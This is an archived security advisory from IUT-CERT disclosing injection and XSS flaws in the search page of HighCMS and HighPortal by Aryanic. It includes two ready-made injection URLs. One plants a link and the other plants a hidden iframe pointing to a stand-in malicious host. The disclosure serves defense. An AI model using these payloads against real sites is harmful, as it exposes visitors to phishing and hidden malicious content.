[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Aryanic HighCMS and HighPortal multiple Vulnerabilities

================= IUT-CERT =================

 Title: Aryanic HighPortal, HighCMS Multiple Vulnerabilities
 Vendor: www.aryanic.com
 Vulnerable Version: 10 and priors
 Type: Input.Validation.Vulnerability (URI Injection, Frame Injection, XSS)
 Fix: N/A

================== nsec.ir =================


	Aryanic is the leading CMS producer in Iran. Search page in HighCMS and HighPortal
	products are vulnerable to multiple input validation vulnerabilities.

Vulnerability Variant:

	1- URI Injection "/web_search.aspx" in "q" parameter.
	http://example.com/includes/web_search.aspx?id=1&q=";<a href="http://www.malicious.com";>clickme</a>
	2- iFrame Injection "/web_search.aspx" in "q" parameter.
	http://example.com/includes/web_search.aspx?id=1&q="iframe src ="http://www.malicious.com"; width="0" height="0"></iframe>

	3- Cross Site Scripting "/web_search.aspx" in "q" parameter.


		Input validation of Parameter "q" should be corrected.

Isfahan University of Technology - Computer Emergency Response Team
Thanks to : E. Jafari, N.Fathi, M. R. Faghani